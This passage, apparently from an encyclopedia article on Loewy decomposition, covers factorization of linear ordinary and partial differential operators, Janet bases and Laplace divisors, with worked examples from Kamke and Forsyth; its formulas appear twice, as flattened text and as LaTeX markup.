L 1 2 : L = l 2 ( 1 ) l 1 ( 1 ) ; L 2 2 : L = Lclm ( l 2 ( 1 ) , l 1 ( 1 ) ) ; L 3 2 : L = Lclm ( l ( 1 ) ( C ) ) . {\displaystyle {\begin{aligned}&{\mathcal {L}}_{1}^{2}:L=l_{2}^{(1)}l_{1}^{(1)};\\&{\mathcal {L}}_{2}^{2}:L=\operatorname {Lclm} \left(l_{2}^{(1)},l_{1}^{(1)}\right);\\&{\mathcal {L}}_{3}^{2}:L=\operatorname {Lclm} \left(l^{(1)}(C)\right).\end{aligned}}}
The decomposition type of an operator is the decomposition L i 2 {\displaystyle {\mathcal {L}}_{i}^{2}} with the highest value of i {\displaystyle i} . An irreducible second-order operator is defined to have decomposition type L 0 2 {\displaystyle {\mathcal {L}}_{0}^{2}} .
The decompositions L 0 2 {\displaystyle {\mathcal {L}}_{0}^{2}} , L 2 2 {\displaystyle {\mathcal {L}}_{2}^{2}} and L 3 2 {\displaystyle {\mathcal {L}}_{3}^{2}} are completely reducible.
If a decomposition of type L i 2 {\displaystyle {\mathcal {L}}_{i}^{2}} , i = 1 , 2 {\displaystyle i=1,2} or 3 {\displaystyle 3} has been obtained for a
second-order equation L y = 0 {\displaystyle Ly=0} , a fundamental system may be given explicitly.
Corollary 2 Let L {\displaystyle L} be a second-order differential operator, D ≡ d d x {\textstyle D\equiv {\frac {d}{dx}}} , y {\displaystyle y} a differential indeterminate, and a i ∈ Q ( x ) {\displaystyle a_{i}\in \mathbb {Q} (x)} . Define ε i ( x ) ≡ exp ( − ∫ a i d x ) {\textstyle \varepsilon _{i}(x)\equiv \exp {\left(-\int a_{i}\,dx\right)}} for i = 1 , 2 {\displaystyle i=1,2} and ε ( x , C ) ≡ exp ( − ∫ a ( C ) d x ) {\textstyle \varepsilon (x,C)\equiv \exp {\left(-\int a(C)\,dx\right)}} , C {\displaystyle C} is a parameter ; the barred quantities C ¯ {\displaystyle {\bar {C}}} and C ¯ ¯ {\displaystyle {\bar {\bar {C}}}} are arbitrary numbers, C ¯ ≠ C ¯ ¯ {\displaystyle {\bar {C}}\neq {\bar {\bar {C}}}} . For the three nontrivial decompositions of Corollary 1 the following elements y 1 {\displaystyle y_{1}} and y 2 {\displaystyle y_{2}} of a fundamental system are obtained.
L 1 2 : L y = ( D + a 2 ) ( D + a 1 ) y = 0 ; {\displaystyle {\mathcal {L}}_{1}^{2}:Ly=(D+a_{2})(D+a_{1})y=0;} y 1 = ε 1 ( x ) , y 2 = ε 1 ( x ) ∫ ε 2 ( x ) ε 1 ( x ) d x . {\displaystyle y_{1}=\varepsilon _{1}(x),\quad y_{2}=\varepsilon _{1}(x)\int {\frac {\varepsilon _{2}(x)}{\varepsilon _{1}(x)}}\,dx.} L 2 2 : L y = Lclm ( D + a 2 , D + a 1 ) y = 0 ; {\displaystyle {\mathcal {L}}_{2}^{2}:Ly=\operatorname {Lclm} (D+a_{2},D+a_{1})y=0;} y i = ε i ( x ) ; {\displaystyle y_{i}=\varepsilon _{i}(x);}
a 1 {\displaystyle a_{1}} is not equivalent to a 2 {\displaystyle a_{2}} .
L 3 2 : L y = Lclm ( D + a ( C ) ) y = 0 ; {\displaystyle {\mathcal {L}}_{3}^{2}:Ly=\operatorname {Lclm} (D+a(C))y=0;} y 1 = ε ( x , C ¯ ) {\displaystyle y_{1}=\varepsilon (x,{\bar {C}})} y 2 = ε ( x , C ¯ ¯ ) . {\displaystyle y_{2}=\varepsilon (x,{\bar {\bar {C}}}).}
Here two rational functions p , q ∈ Q ( x ) {\displaystyle p,q\in \mathbb {Q} (x)} are called equivalent if there exists another rational function r ∈ Q ( x ) {\displaystyle r\in \mathbb {Q} (x)} such that p − q = r ′ r . {\displaystyle p-q={\frac {r'}{r}}.}
There remains the question how to obtain a factorization for a given equation or operator. It turns out that for linear ode's finding the factors comes down to determining rational solutions of Riccati equations or linear ode's; both may be determined algorithmically. The two examples below show how the above corollary is applied.
Example 1 Equation 2.201 from Kamke's collection. [ 4 ] has the L 2 2 {\displaystyle {\mathcal {L}}_{2}^{2}} decomposition y ″ + ( 2 + 1 x ) y ′ − 4 x 2 y = Lclm ( D + 2 x − 2 x − 2 x 2 − 2 x + 3 2 , D + 2 + 2 x − 1 x + 3 2 ) y = 0. {\displaystyle y''+\left(2+{\frac {1}{x}}\right)y'-{\frac {4}{x^{2}}}y=\operatorname {Lclm} \left(D+{\frac {2}{x}}-{\frac {2x-2}{x^{2}-2x+{\frac {3}{2}}}},D+2+{\frac {2}{x}}-{\frac {1}{x+{\frac {3}{2}}}}\right)y=0.}
The coefficients a 1 = 2 + 2 x − 1 x + 3 2 {\textstyle a_{1}=2+{\frac {2}{x}}-{\frac {1}{x+{\frac {3}{2}}}}} and a 2 = 2 x − 2 x − 2 x 2 − 2 x + 3 2 {\textstyle a_{2}={\frac {2}{x}}-{\frac {2x-2}{x^{2}-2x+{\frac {3}{2}}}}} are rational solutions of the Riccati equation a ′ − a 2 + ( 2 + 1 x ) + 4 x 2 = 0 {\textstyle a'-a^{2}+\left(2+{\frac {1}{x}}\right)+{\frac {4}{x^{2}}}=0} , they yield the fundamental system y 1 = 2 3 − 4 3 x + 1 x 2 , {\displaystyle y_{1}={\frac {2}{3}}-{\frac {4}{3x}}+{\frac {1}{x^{2}}},} y 2 = 2 x + 3 x 2 e − 2 x . {\displaystyle y_{2}={\frac {2}{x}}+{\frac {3}{x^{2}}}e^{-2x}.}
Example 2 An equation with a type L 3 2 {\displaystyle {\mathcal {L}}_{3}^{2}} decomposition is y ″ − 6 x 2 y = Lclm ( D + 2 x − 5 x 4 x 5 + C ) y = 0. {\displaystyle y''-{\frac {6}{x^{2}}}y=\operatorname {Lclm} \left(D+{\frac {2}{x}}-{\frac {5x^{4}}{x^{5}+C}}\right)y=0.}
The coefficient of the first-order factor is the rational solution of a ′ − a 2 + 6 x 2 = 0 {\textstyle a'-a^{2}+{\frac {6}{x^{2}}}=0} . Upon integration the fundamental system y 1 = x 3 {\textstyle y_{1}=x^{3}} and y 2 = 1 x 2 {\textstyle y_{2}={\frac {1}{x^{2}}}} for C = 0 {\displaystyle C=0} and C → ∞ {\displaystyle C\to \infty } respectively is obtained.
These results show that factorization provides an algorithmic scheme for solving reducible linear ode's. Whenever an equation of order 2 factorizes according to one of the types defined above the elements of a fundamental system are explicitly known, i.e. factorization is equivalent to solving it.
A similar scheme may be set up for linear ode's of any order, although the number of alternatives grows considerably with the order; for order n = 3 {\displaystyle n=3} the answer is given in full detail in. [ 2 ]
If an equation is irreducible it may occur that its Galois group is nontrivial, then algebraic solutions may exist. [ 5 ] If the Galois group is trivial it may be possible to express the solutions in terms of special function like e.g. Bessel or Legendre functions , see [ 6 ] or. [ 7 ]
In order to generalize Loewy's result to linear PDEs it is necessary to apply the more general setting of differential algebra . Therefore, a few basic concepts that are required for this purpose are given next.
A field F {\displaystyle {\mathcal {F}}} is called a differential field if it is equipped with a derivation operator . An operator δ {\displaystyle \delta } on a field F {\displaystyle {\mathcal {F}}} is called a derivation operator if δ ( a + b ) = δ ( a ) + δ ( b ) {\displaystyle \delta (a+b)=\delta (a)+\delta (b)} and δ ( a b ) = δ ( a ) b + a δ ( b ) {\displaystyle \delta (ab)=\delta (a)b+a\delta (b)} for all elements a , b ∈ F {\displaystyle a,b\in {\mathcal {F}}} . A field with a single derivation operator is called an ordinary differential field ; if there is a finite set containing several commuting derivation operators the field is called a partial differential field .
Here differential operators with derivatives ∂ x = ∂ ∂ x {\textstyle \partial _{x}={\frac {\partial }{\partial x}}} and ∂ y = ∂ ∂ y {\textstyle \partial _{y}={\frac {\partial }{\partial y}}} with coefficients from some differential field are considered. Its elements have the form ∑ i , j r i , j ( x , y ) ∂ x i ∂ y j {\textstyle \sum _{i,j}r_{i,j}(x,y)\partial _{x}^{i}\partial _{y}^{j}} ; almost all coefficients r i , j {\displaystyle r_{i,j}} are zero. The coefficient field is called the base field . If constructive and algorithmic methods are the main issue it is Q ( x , y ) {\displaystyle \mathbb {Q} (x,y)} . The respective ring of differential operators is denoted by D = Q ( x , y ) [ ∂ x , ∂ y ] {\displaystyle {\mathcal {D}}=\mathbb {Q} (x,y)[\partial _{x},\partial _{y}]} or D = F [ ∂ x , ∂ y ] {\displaystyle {\mathcal {D}}={\mathcal {F}}[\partial _{x},\partial _{y}]} . The ring D {\displaystyle {\mathcal {D}}} is non-commutative, ∂ x a = a ∂ x + ∂ a ∂ x {\textstyle \partial _{x}a=a\partial _{x}+{\frac {\partial a}{\partial x}}} and similarly for the other variables; a {\displaystyle a} is from the base field.
For an operator L = ∑ i + j ≤ n r i , j ( x , y ) ∂ x i ∂ y j {\textstyle L=\sum _{i+j\leq n}r_{i,j}(x,y)\partial _{x}^{i}\partial _{y}^{j}} of order n {\displaystyle n} the symbol of L is the homogeneous algebraic polynomial symb ( L ) ≡ ∑ i + j = n r i , j ( x , y ) X i Y j {\textstyle \operatorname {symb} (L)\equiv \sum _{i+j=n}r_{i,j}(x,y)X^{i}Y^{j}} where X {\displaystyle X} and Y {\displaystyle Y} algebraic indeterminates.
Let I {\displaystyle I} be a left ideal which is generated by l i ∈ D {\displaystyle l_{i}\in {\mathcal {D}}} , i = 1 , … , p {\displaystyle i=1,\ldots ,p} . Then one writes I = ⟨ l 1 , … , l p ⟩ {\displaystyle I=\langle l_{1},\ldots ,l_{p}\rangle } . Because right ideals are not considered here, sometimes I {\displaystyle I} is simply called an ideal.
The relation between left ideals in D {\displaystyle {\mathcal {D}}} and systems of linear PDEs is established as follows. The elements l i ∈ D {\displaystyle l_{i}\in {\mathcal {D}}} are applied to a single differential indeterminate z {\displaystyle z} . In this way the ideal I = ⟨ l 1 , l 2 , … ⟩ {\displaystyle I=\langle l_{1},l_{2},\ldots \rangle } corresponds to the system of PDEs l 1 z = 0 {\displaystyle l_{1}z=0} , l 2 z = 0 , … {\displaystyle l_{2}z=0,\ldots } for the single function z {\displaystyle z} .
The generators of an ideal are highly non-unique; its members may be transformed in infinitely many ways by taking linear combinations of them or its derivatives without changing the ideal. Therefore, M. Janet [ 8 ] introduced a normal form for systems of linear PDEs (see Janet basis ). [ 9 ] They are the differential analog to Gröbner bases of commutative algebra (which were originally introduced by Bruno Buchberger ); [ 10 ] therefore they are also sometimes called differential Gröbner basis .
In order to generate a Janet basis, a ranking of derivatives must be defined. It is a total ordering such that for any derivatives δ {\displaystyle \delta } , δ 1 {\displaystyle \delta _{1}} and δ 2 {\displaystyle \delta _{2}} , and any derivation operator θ {\displaystyle \theta } the relations δ ⪯ θ δ {\displaystyle \delta \preceq \theta \delta } , and δ 1 ⪯ δ 2 → δ δ 1 ⪯ δ δ 2 {\displaystyle \delta _{1}\preceq \delta _{2}\rightarrow \delta \delta _{1}\preceq \delta \delta _{2}} are valid. Here graded lexicographic term orderings g r l e x {\displaystyle grlex} are applied. For partial derivatives of a single function their definition is analogous to the monomial orderings in commutative algebra . The S-pairs in commutative algebra correspond to the integrability conditions.
If it is assured that the generators l 1 , … , l p {\displaystyle l_{1},\ldots ,l_{p}} of an ideal I {\displaystyle I} form a Janet basis the notation I = ⟨ ⟨ l 1 , … , l p ⟩ ⟩ {\displaystyle I={{\big \langle }{\big \langle }}l_{1},\ldots ,l_{p}{{\big \rangle }{\big \rangle }}} is applied.
Example 3 Consider the ideal I = ⟨ l 1 ≡ ∂ x x − 1 x ∂ x − y x ( x + y ) ∂ y , l 2 ≡ ∂ x y + 1 x + y ∂ y , l 3 ≡ ∂ y y + 1 x + y ∂ y ⟩ {\displaystyle I={\Big \langle }l_{1}\equiv \partial _{xx}-{\frac {1}{x}}\partial _{x}-{\frac {y}{x(x+y)}}\partial _{y},\;l_{2}\equiv \partial _{xy}+{\frac {1}{x+y}}\partial _{y},\;l_{3}\equiv \partial _{yy}+{\frac {1}{x+y}}\partial _{y}{\Big \rangle }} in g r l e x {\displaystyle grlex} term order with x ≻ y {\displaystyle x\succ y} . Its generators are autoreduced. If the integrability condition l 1 , y = l 2 , x − l 2 , y = y + 2 x x ( x + y ) ∂ x y + y x ( x + y ) ∂ y y {\displaystyle l_{1,y}=l_{2,x}-l_{2,y}={\frac {y+2x}{x(x+y)}}\partial _{xy}+{\frac {y}{x(x+y)}}\partial _{yy}} is reduced with respect to I {\displaystyle I} , the new generator ∂ y {\displaystyle \partial _{y}} is obtained. Adding it to the generators and performing all possible reductions, the given ideal is represented as I = ⟨ ⟨ ∂ x x − 1 x ∂ x , ∂ y ⟩ ⟩ {\textstyle I=\left\langle \left\langle \partial _{xx}-{\frac {1}{x}}\partial _{x},\partial _{y}\right\rangle \right\rangle } .
Its generators are autoreduced and the single integrability condition is satisfied, i.e. they form a Janet basis.
Given any ideal I {\displaystyle I} it may occur that it is properly contained in some larger ideal J {\displaystyle J} with coefficients in the base field of I {\displaystyle I} ; then J {\displaystyle J} is called a divisor of I {\displaystyle I} . In general, a divisor in a ring of partial differential operators need not be principal.
The greatest common right divisor (Gcrd) or sum of two ideals I {\displaystyle I} and J {\displaystyle J} is the smallest ideal with the property that both I {\displaystyle I} and J {\displaystyle J} are contained in it. If they have the representation I ≡ ⟨ f 1 , … , f p ⟩ {\displaystyle I\equiv \langle f_{1},\ldots ,f_{p}\rangle } and J ≡ ⟨ g 1 , … , g q ⟩ , {\displaystyle J\equiv \langle g_{1},\ldots ,g_{q}\rangle ,} f i {\displaystyle f_{i}} , g j ∈ D {\displaystyle g_{j}\in {\mathcal {D}}} for all i {\displaystyle i} and j {\displaystyle j} , the sum is generated by the union of the generators of I {\displaystyle I} and J {\displaystyle J} . The solution space of the equations corresponding to Gcrd ( I , J ) {\displaystyle \operatorname {Gcrd} (I,J)} is the intersection of the solution spaces of its arguments.
The least common left multiple (Lclm) or left intersection of two ideals I {\displaystyle I} and J {\displaystyle J} is the largest ideal with the property that it is contained both in I {\displaystyle I} and J {\displaystyle J} . The solution space of Lclm ( I , J ) z = 0 {\displaystyle \operatorname {Lclm} (I,J)z=0} is the smallest space containing the solution spaces of its arguments.
A special kind of divisor is the so-called Laplace divisor of a given operator L {\displaystyle L} , [ 2 ] page 34. It is defined as follows.
Definition Let L {\displaystyle L} be a partial differential operator in the plane; define l m ≡ ∂ x m + a m − 1 ∂ x m − 1 + ⋯ + a 1 ∂ x + a 0 {\displaystyle {\mathfrak {l}}_{m}\equiv \partial _{x^{m}}+a_{m-1}\partial _{x^{m-1}}+\dots +a_{1}\partial _{x}+a_{0}} and k n ≡ ∂ y n + b n − 1 ∂ y n − 1 + ⋯ + b 1 ∂ y + b 0 {\displaystyle {\mathfrak {k}}_{n}\equiv \partial _{y^{n}}+b_{n-1}\partial _{y^{n-1}}+\dots +b_{1}\partial _{y}+b_{0}} be ordinary differential operators with respect to x {\displaystyle x} or y {\displaystyle y} ; a i , b i ∈ Q ( x , y ) {\displaystyle a_{i},b_{i}\in \mathbb {Q} (x,y)} for all i; m {\displaystyle m} and n {\displaystyle n} are natural numbers not less than 2. Assume the coefficients a i {\displaystyle a_{i}} , i = 0 , … , m − 1 {\displaystyle i=0,\ldots ,m-1} are such that L {\displaystyle L} and l m {\displaystyle {\mathfrak {l}}_{m}} form a Janet basis. If m {\displaystyle m} is the smallest integer with this property then L x m ( L ) ≡ ⟨ ⟨ L , l m ⟩ ⟩ {\displaystyle \mathbb {L} _{x^{m}}(L)\equiv {\langle \langle }L,{\mathfrak {l}}_{m}{\rangle \rangle }} is called a Laplace divisor of L {\displaystyle L} . Similarly, if b j {\displaystyle b_{j}} , j = 0 , … , n − 1 {\displaystyle j=0,\ldots ,n-1} are such that L {\displaystyle L} and k n {\displaystyle {\mathfrak {k}}_{n}} form a Janet basis and n {\displaystyle n} is minimal, then L y n ( L ) ≡ ⟨ ⟨ L , k n ⟩ ⟩ {\displaystyle \mathbb {L} _{y^{n}}(L)\equiv {\langle \langle }L,{\mathfrak {k}}_{n}{\rangle \rangle }} is also called a Laplace divisor of L {\displaystyle L} .
In order for a Laplace divisor to exist the coeffients of an operator L {\displaystyle L} must obey certain constraints. [ 3 ] An algorithm for determining an upper bound for a Laplace divisor is not known at present, therefore in general the existence of a Laplace divisor may be undecidable.
Applying the above concepts Loewy's theory may be generalized to linear PDEs. Here it is applied to individual linear PDEs of second order in the plane with coordinates x {\displaystyle x} and y {\displaystyle y} , and the principal ideals generated by the corresponding operators.
Second-order equations have been considered extensively in the literature of the 19th century,. [ 11 ] [ 12 ] Usually equations with leading derivatives ∂ x x {\displaystyle \partial _{xx}} or ∂ x y {\displaystyle \partial _{xy}} are distinguished. Their general solutions contain not only constants but undetermined functions of varying numbers of arguments; determining them is part of the solution procedure. For equations with leading derivative ∂ x x {\displaystyle \partial _{xx}} Loewy's results may be generalized as follows.
Theorem 2 Let the differential operator L {\displaystyle L} be defined by L ≡ ∂ x x + A 1 ∂ x y + A 2 ∂ y y + A 3 ∂ x + A 4 ∂ y + A 5 {\displaystyle L\equiv \partial _{xx}+A_{1}\partial _{xy}+A_{2}\partial _{yy}+A_{3}\partial _{x}+A_{4}\partial _{y}+A_{5}} where A i ∈ Q ( x , y ) {\displaystyle A_{i}\in \mathbb {Q} (x,y)} for all i {\displaystyle i} .
Let l i ≡ ∂ x + a i ∂ y + b i {\displaystyle l_{i}\equiv \partial _{x}+a_{i}\partial _{y}+b_{i}} for i = 1 {\displaystyle i=1} and i = 2 {\displaystyle i=2} , and l ( Φ ) ≡ ∂ x + a ∂ y + b ( Φ ) {\displaystyle l(\Phi )\equiv \partial _{x}+a\partial _{y}+b(\Phi )} be first-order operators with a i , b i , a ∈ Q ( x , y ) {\displaystyle a_{i},b_{i},a\in \mathbb {Q} (x,y)} ; Φ {\displaystyle \Phi } is an undetermined function of a single argument. Then L {\displaystyle L} has a Loewy decomposition according to one of the following types.
The decomposition type of an operator L {\displaystyle L} is the decomposition L x x i {\displaystyle {\mathcal {L}}_{xx}^{i}} with the highest value of i {\displaystyle i} . If L {\displaystyle L} does not have any first-order factor in the base field, its decomposition type is defined to be L x x 0 {\displaystyle {\mathcal {L}}_{xx}^{0}} . Decompositions L x x 0 {\displaystyle {\mathcal {L}}_{xx}^{0}} , L x x 2 {\displaystyle {\mathcal {L}}_{xx}^{2}} and L x x 3 {\displaystyle {\mathcal {L}}_{xx}^{3}} are completely reducible.
In order to apply this result for solving any given differential equation involving the operator L {\displaystyle L} the question arises whether its first-order factors may be determined algorithmically. The subsequent corollary provides the answer for factors with coefficients either in the base field or a universal field extension.
Corollary 3 In general, first-order right factors of a linear pde in the base field cannot be determined algorithmically. If the symbol polynomial is separable any factor may be determined. If it has a double root in general it is not possible to determine the right factors in the base field. The existence of factors in a universal field, i.e. absolute irreducibility, may always be decided.
The above theorem may be applied for solving reducible equations in closed form. Because there are only principal divisors involved the answer is similar as for ordinary second-order equations.
Proposition 1 Let a reducible second-order equation L z ≡ z x x + A 1 z x y + A 2 z y y + A 3 z x + A 4 z y + A 5 z = 0 {\displaystyle Lz\equiv z_{xx}+A_{1}z_{xy}+A_{2}z_{yy}+A_{3}z_{x}+A_{4}z_{y}+A_{5}z=0} where A 1 , … , A 5 ∈ Q ( x , y ) {\displaystyle A_{1},\ldots ,A_{5}\in \mathbb {Q} (x,y)} .
Define l i ≡ ∂ x + a i ∂ y + b i {\displaystyle l_{i}\equiv \partial _{x}+a_{i}\partial _{y}+b_{i}} , a i , b i ∈ Q ( x , y ) {\displaystyle a_{i},b_{i}\in \mathbb {Q} (x,y)} for i = 1 , 2 {\displaystyle i=1,2} ; φ i ( x , y ) = c o n s t {\displaystyle \varphi _{i}(x,y)=\mathrm {const} } is a rational first integral of d y d x = a i ( x , y ) {\displaystyle {\frac {dy}{dx}}=a_{i}(x,y)} ; y ¯ ≡ φ i ( x , y ) {\displaystyle {\bar {y}}\equiv \varphi _{i}(x,y)} and the inverse y = ψ i ( x , y ¯ ) {\displaystyle y=\psi _{i}(x,{\bar {y}})} ; both φ i {\displaystyle \varphi _{i}} and ψ i {\displaystyle \psi _{i}} are assumed to exist. Furthermore, define E i ( x , y ) ≡ exp ( − ∫ b i ( x , y ) | y = ψ i ( x , y ¯ ) d x ) | y ¯ = φ i ( x , y ) {\displaystyle {\mathcal {E}}_{i}(x,y)\equiv \left.\exp \left(-\int b_{i}(x,y){\big |}_{y=\psi _{i}(x,{\bar {y}})}dx\right)\right|_{{\bar {y}}=\varphi _{i}(x,y)}} for i = 1 , 2 {\displaystyle i=1,2} .
A differential fundamental system has the following structure for the various decompositions into first-order components.
L x x 1 : z 1 ( x , y ) = E 1 ( x , y ) F 1 ( φ 1 ) , {\displaystyle {\mathcal {L}}_{xx}^{1}:z_{1}(x,y)={\mathcal {E}}_{1}(x,y)F_{1}(\varphi _{1}),} z 2 ( x , y ) = E 1 ( x , y ) ∫ E 2 ( x , y ) E 1 ( x , y ) F 2 ( φ 2 ( x , y ) ) | y = ψ 1 ( x , y ¯ ) d x | y ¯ = φ 1 ( x , y ) ; {\displaystyle z_{2}(x,y)={\mathcal {E}}_{1}(x,y){\displaystyle \int }{\frac {{\mathcal {E}}_{2}(x,y)}{{\mathcal {E}}_{1}(x,y)}}F_{2}{\big (}\varphi _{2}(x,y){\big )}{\big |}_{y=\psi _{1}(x,{\bar {y}})}dx{\Big |}_{{\bar {y}}=\varphi _{1}(x,y)};} L x x 2 : z i ( x , y ) = E i ( x , y ) F i ( φ i ( x , y ) ) , i = 1 , 2 ; {\displaystyle {\mathcal {L}}_{xx}^{2}:z_{i}(x,y)={\mathcal {E}}_{i}(x,y)F_{i}{\big (}\varphi _{i}(x,y){\big )},i=1,2;} L x x 3 : z i ( x , y ) = E i ( x , y ) F i ( φ ( x , y ) ) , i = 1 , 2. {\displaystyle {\mathcal {L}}_{xx}^{3}:z_{i}(x,y)={\mathcal {E}}_{i}(x,y)F_{i}{\big (}\varphi (x,y){\big )},i=1,2.}
The F i {\displaystyle F_{i}} are undetermined functions of a single argument; φ {\displaystyle \varphi } , φ 1 {\displaystyle \varphi _{1}} and φ 2 {\displaystyle \varphi _{2}} are rational in all arguments; ψ 1 {\displaystyle \psi _{1}} is assumed
to exist. In general φ 1 ≠ φ 2 {\displaystyle \varphi _{1}\neq \varphi _{2}} , they are determined
by the coefficients A 1 {\displaystyle A_{1}} , A 2 {\displaystyle A_{2}} and A 3 {\displaystyle A_{3}} of the given equation.
A typical example of a linear pde where factorization applies is an equation that has been discussed by Forsyth, [ 13 ] vol. VI, page 16,
Example 5 (Forsyth 1906)
Consider the differential equation z x x − z y y + 4 x + y z x = 0 {\textstyle z_{xx}-z_{yy}+{\frac {4}{x+y}}z_{x}=0} . Upon factorization the representation L z ≡ l 2 l 1 z = ( ∂ x + ∂ y + 2 x + y ) ( ∂ x − ∂ y + 2 x + y ) z = 0 {\displaystyle Lz\equiv l_{2}l_{1}z=\left(\partial _{x}+\partial _{y}+{\frac {2}{x+y}}\right)\left(\partial _{x}-\partial _{y}+{\frac {2}{x+y}}\right)z=0} is obtained. There follows φ 1 ( x , y ) = x + y , ψ 1 ( x , y ) = y ¯ − x , E 1 ( x , y ) = exp ( 2 y x + y ) , {\displaystyle \varphi _{1}(x,y)=x+y,\psi _{1}(x,y)={\bar {y}}-x,{\mathcal {E}}_{1}(x,y)=\exp {\left({\frac {2y}{x+y}}\right)},} φ 2 ( x , y ) = x − y , ψ 2 ( x , y ) = x − y ¯ , E 2 ( x , y ) = − 1 x + y . {\displaystyle \varphi _{2}(x,y)=x-y,\psi _{2}(x,y)=x-{\bar {y}},{\mathcal {E}}_{2}(x,y)=-{\frac {1}{x+y}}.}
Consequently, a differential fundamental system is
z 1 ( x , y ) = exp ( 2 y x + y ) F ( x + y ) , {\displaystyle z_{1}(x,y)=\exp {\left({\frac {2y}{x+y}}\right)}F(x+y),} z 2 ( x , y ) = 1 x + y exp ( 2 y x + y ) ∫ exp ( 2 x − y ¯ y ¯ ) G ( 2 x − y ¯ ) d x | y ¯ = x + y . {\displaystyle z_{2}(x,y)={\frac {1}{x+y}}\exp {\left({\frac {2y}{x+y}}\right)}\int \exp {\left({\frac {2x-{\bar {y}}}{\bar {y}}}\right)}G(2x-{\bar {y}})dx{\Big |}_{{\bar {y}}=x+y}.}
F {\displaystyle F} and G {\displaystyle G} are undetermined functions.
If the only second-order derivative of an operator is ∂ x y {\displaystyle \partial _{xy}} , its possible decompositions
involving only principal divisors may be described as follows.
Theorem 3 Let the differential operator L {\displaystyle L} be defined by L ≡ ∂ x y + A 1 ∂ x + A 2 ∂ y + A 3 {\displaystyle L\equiv \partial _{xy}+A_{1}\partial _{x}+A_{2}\partial _{y}+A_{3}} where A i ∈ Q ( x , y ) {\displaystyle A_{i}\in \mathbb {Q} (x,y)} for all i {\displaystyle i} .
Let l ≡ ∂ x + A 2 {\displaystyle l\equiv \partial _{x}+A_{2}} and k ≡ ∂ y + A 1 {\displaystyle k\equiv \partial _{y}+A_{1}} are first-order operators. L {\displaystyle L} has Loewy decompositions involving first-order principal divisors of the following form.
The decomposition type of an operator L {\displaystyle L} is the decomposition L x y i {\displaystyle {\mathcal {L}}_{xy}^{i}} with highest value of i {\displaystyle i} . The decomposition of type L x y 3 {\displaystyle {\mathcal {L}}_{xy}^{3}} is completely reducible
In addition there are five more possible decomposition types involving non-principal Laplace divisors as shown next.
Theorem 4 Let the differential operator L {\displaystyle L} be defined by L ≡ ∂ x y + A 1 ∂ x + A 2 ∂ y + A 3 {\displaystyle L\equiv \partial _{xy}+A_{1}\partial _{x}+A_{2}\partial _{y}+A_{3}} where A i ∈ Q ( x , y ) {\displaystyle A_{i}\in \mathbb {Q} (x,y)} for all i {\displaystyle i} .
L x m ( L ) {\displaystyle \mathbb {L} _{x^{m}}(L)} and L y n ( L ) {\displaystyle \mathbb {L} _{y^{n}}(L)} as well as l m {\displaystyle {\mathfrak {l}}_{m}} and k n {\displaystyle {\mathfrak {k}}_{n}} are defined above; furthermore l ≡ ∂ x + a {\displaystyle l\equiv \partial _{x}+a} , k ≡ ∂ y + b {\displaystyle k\equiv \partial _{y}+b} , a , b ∈ Q ( x , y ) {\displaystyle a,b\in \mathbb {Q} (x,y)} . L {\displaystyle L} has Loewy decompositions involving Laplace divisors according to one of the following types; m {\displaystyle m} and n {\displaystyle n} obey m , n ≥ 2 {\displaystyle m,n\geq 2} .
L x y 4 : L = Lclm ( L x m ( L ) , L y n ( L ) ) ; {\displaystyle {\mathcal {L}}_{xy}^{4}:L=\operatorname {Lclm} \left(\mathbb {L} _{x^{m}}(L),\mathbb {L} _{y^{n}}(L)\right);} L x y 5 : L = E x q u o ( L , L x m ( L ) ) L x m ( L ) = ( 1 0 0 ∂ y + A 1 ) ( L l m ) ; {\displaystyle {\mathcal {L}}_{xy}^{5}:L=Exquo{\big (}L,\mathbb {L} _{x^{m}}(L){\big )}\mathbb {L} _{x^{m}}(L)={\begin{pmatrix}1&0\\0&\partial _{y}+A_{1}\end{pmatrix}}{\begin{pmatrix}L\\{\mathfrak {l}}_{m}\end{pmatrix}};} L x y 6 : L = E x q u o ( L , L y n ( L ) ) L y n ( L ) = ( 1 0 0 ∂ x + A 2 ) ( L k n ) ; {\displaystyle {\mathcal {L}}_{xy}^{6}:L=Exquo{\big (}L,\mathbb {L} _{y^{n}}(L){\big )}\mathbb {L} _{y^{n}}(L)={\begin{pmatrix}1&0\\0&\partial _{x}+A_{2}\end{pmatrix}}{\begin{pmatrix}L\\{\mathfrak {k}}_{n}\end{pmatrix}};} L x y 7 : L = Lclm ( k , L x m ( L ) ) ; {\displaystyle {\mathcal {L}}_{xy}^{7}:L=\operatorname {Lclm} {\big (}k,\mathbb {L} _{x^{m}}(L){\big )};} L x y 8 : L = Lclm ( l , L y n ( L ) ) . {\displaystyle {\mathcal {L}}_{xy}^{8}:L=\operatorname {Lclm} {\big (}l,\mathbb {L} _{y^{n}}(L){\big )}.}
If L {\displaystyle L} does not have a first order right factor and it may be shown that a Laplace divisor does not exist its decomposition type is defined to be L x y 0 {\displaystyle {\mathcal {L}}_{xy}^{0}} . The decompositions L x y 0 {\displaystyle {\mathcal {L}}_{xy}^{0}} , L x y 4 {\displaystyle {\mathcal {L}}_{xy}^{4}} , L x y 7 {\displaystyle {\mathcal {L}}_{xy}^{7}} and L x y 8 {\displaystyle {\mathcal {L}}_{xy}^{8}} are completely reducible.
An equation that does not allow a decomposition involving principal divisors but is completely reducible with respect to non-principal Laplace divisors of type L x y 4 {\displaystyle {\mathcal {L}}_{xy}^{4}} has been considered by Forsyth.
Example 6 (Forsyth 1906) Define L ≡ ∂ x y + 2 x − y ∂ x v − 2 x − y ∂ y − 4 ( x − y ) 2 {\displaystyle L\equiv \partial _{xy}+{\frac {2}{x-y}}\partial _{x}v-{\frac {2}{x-y}}\partial _{y}-{\frac {4}{(x-y)^{2}}}} generating the principal ideal ⟨ L ⟩ {\displaystyle \langle L\rangle } . A first-order factor does not exist. However, there are Laplace divisors L x 2 ( L ) ≡ ⟨ ⟨ ∂ x x − 2 x − y ∂ x + 2 ( x − y ) 2 , L ⟩ ⟩ {\displaystyle \mathbb {L} _{x^{2}}(L)\equiv {{\Big \langle }{\Big \langle }}\partial _{xx}-{\frac {2}{x-y}}\partial _{x}+{\frac {2}{(x-y)^{2}}},L{{\Big \rangle }{\Big \rangle }}} and L y 2 ( L ) ≡ ⟨ ⟨ L , ∂ y y + 2 x − y ∂ y + 2 ( x − y ) 2 ⟩ ⟩ . {\displaystyle \mathbb {L} _{y^{2}}(L)\equiv {{\Big \langle }{\Big \langle }}L,\partial _{yy}+{\frac {2}{x-y}}\partial _{y}+{\frac {2}{(x-y)^{2}}}{{\Big \rangle }{\Big \rangle }}.}
